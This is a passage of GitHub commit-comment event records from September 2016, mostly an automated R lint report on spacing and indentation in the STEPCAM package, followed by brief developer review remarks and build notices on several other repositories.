^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:51:30:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:51:49:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^\n```\n[R/generateArtificialData.R:53:16:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:54:43:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                         ~^~~\n```\n[R/generateArtificialData.R:54:77:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                                                           ~^~\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L56) *style:* **lines should not be more than 80 characters.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:56:27:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                         ~^~~\n```\n[R/generateArtificialData.R:56:31:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                              ^\n```\n[R/generateArtificialData.R:56:57:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                       ~^~\n```\n[R/generateArtificialData.R:56:90:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                                                        ~^~\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:57:29:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:58:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L58) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:59:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L59) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:63:11:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L63) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n          ^\n```\n[R/generateArtificialData.R:63:58:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:65:14:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:65:62:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:66:11:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n          ^\n```\n[R/generateArtificialData.R:66:58:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L69) *style:* **lines should not be more than 80 characters.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:69:26:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n                        ~^~~\n```\n[R/generateArtificialData.R:70:33:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L72) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n"}},"created_at":"2016-09-20T19:35:46Z"}
{"id":"4591960147","type":"CommitCommentEvent","actor":{"login":"jeffknupp"},"repo":{"name":"jeffknupp/sandman2"},"payload":{"comment":{"id":19102660,"position":null,"line":null,"path":null,"commit_id":"ca1f5408a90f1d9e23a5c24b6ffb418bb0ae5017","created_at":"2016-09-20T19:36:09Z","updated_at":"2016-09-20T19:36:09Z","body":"This is fixed in version 1.0.4. Sorry about that!"}},"created_at":"2016-09-20T19:36:09Z"}
{"id":"4591961669","type":"CommitCommentEvent","actor":{"login":"olegrjumin"},"repo":{"name":"olegrjumin/Health-App-Calendar-UI"},"payload":{"comment":{"id":19102663,"position":4,"line":4,"path":".gitignore","commit_id":"194b3a921aa75d2577a98c6418b62e06452a6e92","created_at":"2016-09-20T19:36:20Z","updated_at":"2016-09-20T19:36:20Z","body":"#1 comment "}},"created_at":"2016-09-20T19:36:20Z"}
{"id":"4591961745","type":"CommitCommentEvent","actor":{"login":"Piorjade"},"repo":{"name":"Piorjade/cLinux"},"payload":{"comment":{"id":19102664,"position":null,"line":null,"path":null,"commit_id":"fbbcb925f6b703bb6ea7956919c8ce73c83839d2","created_at":"2016-09-20T19:36:21Z","updated_at":"2016-09-20T19:36:21Z","body":"Forgot to write that into the info:\r\n- The user is now able to execute files, which are in his current directory\r\nNOTE: Files in the current directory are #1 priority (meaning that if the user has 2 programs with the same name, in home and /usr/bin, the OS boots the one in home everytime), I don't know if I should keep this, or add something like a './' prefix to tell the OS to boot the one in home..."}},"created_at":"2016-09-20T19:36:21Z"}
{"id":"4591963495","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19102668,"position":null,"line":null,"path":null,"commit_id":"6aedccff67daca9a593e17a0df3188fde030e339","created_at":"2016-09-20T19:36:37Z","updated_at":"2016-09-20T19:36:37Z","body":"You have made some good changes, but avoid logic changes.\r\nFrom the original get_repo_data(saltenv='base')\r\n```\r\n    # we only call refresh_db if it does not exist, as we want to return\r\n    # the existing data even if its old, other parts of the code call this,\r\n    # but they will call refresh if they need too.\r\n    if repo_age_sec == -1:\r\n        # no repo meta db\r\n        log.debug('No winrepo.p cache file. Refresh pkg db now.')\r\n        _refresh_db_conditional(saltenv=saltenv)\r\n\r\n```\r\nhas become\r\n` _refresh_db_conditional(saltenv=saltenv, failhard=failhard)`    \r\nwhich is bad.   If something goes wrong you can not get the original data to investigate an issue and also results in _refresh_db_conditional being called heaps more this in a single run.\r\n\r\nThanks"}},"created_at":"2016-09-20T19:36:37Z"}
{"id":"4591963836","type":"CommitCommentEvent","actor":{"login":"Jacobingalls"},"repo":{"name":"Jacobingalls/EE461L-Metablog"},"payload":{"comment":{"id":19102669,"position":5,"line":6,"path":"war/WEB-INF/cron.xml","commit_id":"efb9c747467300c376a56425c64460e01735681d","created_at":"2016-09-20T19:36:40Z","updated_at":"2016-09-20T19:36:40Z","body":"Should this be 1day?\r\nJust looks weird."}},"created_at":"2016-09-20T19:36:40Z"}
{"id":"4591964388","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19102672,"position":null,"line":null,"path":null,"commit_id":"eaf7928ec389776610a1d9b38cac282e0fbc54a4","created_at":"2016-09-20T19:36:45Z","updated_at":"2016-09-20T19:36:45Z","body":"MakeWebKitWork (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-eaf7928ec389776610a1d9b38cac282e0fbc54a4-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-eaf7928ec389776610a1d9b38cac282e0fbc54a4-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-20T19:36:45Z"}
{"id":"4591965302","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19102673,"position":91,"line":91,"path":"lib/node_modules/@stdlib/math/base/random/lib/index.js","commit_id":"35b7441c90fc9f117edd7667cd2ecd267dcc4b64","created_at":"2016-09-20T19:36:54Z","updated_at":"2016-09-20T19:36:54Z","body":"Just checked: A TypeError is only thrown if one tries to re-define the property to a new value. Setting it to the same value does not throw an error. "}},"created_at":"2016-09-20T19:36:54Z"}
{"id":"4591968244","type":"CommitCommentEvent","actor":{"login":"cyberblast"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19102681,"position":null,"line":null,"path":null,"commit_id":"b1cbe4fb362a32dccaf795fd727e5787d57c66f2","created_at":"2016-09-20T19:37:20Z","updated_at":"2016-09-20T19:37:20Z","body":"A container can be used in addition"}},"created_at":"2016-09-20T19:37:20Z"}
{"id":"4591968595","type":"CommitCommentEvent","actor":{"login":"fromAtoZ"},"repo":{"name":"rsatrasala/Google-MoPub-Native-Adapters-iOS"},"payload":{"comment":{"id":19102684,"position":null,"line":null,"path":null,"commit_id":"39d0b7ca7f7f8f161f4fedb2242f06947f380374","created_at":"2016-09-20T19:37:24Z","updated_at":"2016-09-20T19:37:24Z","body":"I couldn't comment on places that are not changed in this PR. Might be beneficial to create a new CR for John and I take a final look."}},"created_at":"2016-09-20T19:37:24Z"}
{"id":"4591969206","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19102685,"position":91,"line":91,"path":"lib/node_modules/@stdlib/math/base/random/lib/index.js","commit_id":"35b7441c90fc9f117edd7667cd2ecd267dcc4b64","created_at":"2016-09-20T19:37:30Z","updated_at":"2016-09-20T19:37:30Z","body":"Interesting. Thanks for the intel!"}},"created_at":"2016-09-20T19:37:30Z"}
{"id":"4591969377","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19102686,"position":4,"line":4,"path":"lib/node_modules/@stdlib/math/base/random/package.json","commit_id":"35b7441c90fc9f117edd7667cd2ecd267dcc4b64","created_at":"2016-09-20T19:37:31Z","updated_at":"2016-09-20T19:37:31Z","body":"Thanks!"}},"created_at":"2016-09-20T19:37:31Z"}
{"id":"4591972097","type":"CommitCommentEvent","actor":{"login":"bitstorm"},"repo":{"name":"wicketstuff/core"},"payload":{"comment":{"id":19102694,"position":null,"line":null,"path":null,"commit_id":"7572720aac129f034137eabded38c3f2f942c93d","created_at":"2016-09-20T19:37:56Z","updated_at":"2016-09-20T19:37:56Z","body":"yep! and travis is quite unfriendly with Java :-)\r\n"}},"created_at":"2016-09-20T19:37:56Z"}
{"id":"4591972314","type":"CommitCommentEvent","actor":{"login":"PrimePrograming"},"repo":{"name":"PrimePrograming/Hello-World"},"payload":{"comment":{"id":19102695,"position":null,"line":null,"path":null,"commit_id":"ef0eaedea3d38c0e504ecec8319273f13d180543","created_at":"2016-09-20T19:37:58Z","updated_at":"2016-09-20T19:37:58Z","body":"Hello."}},"created_at":"2016-09-20T19:37:58Z"}
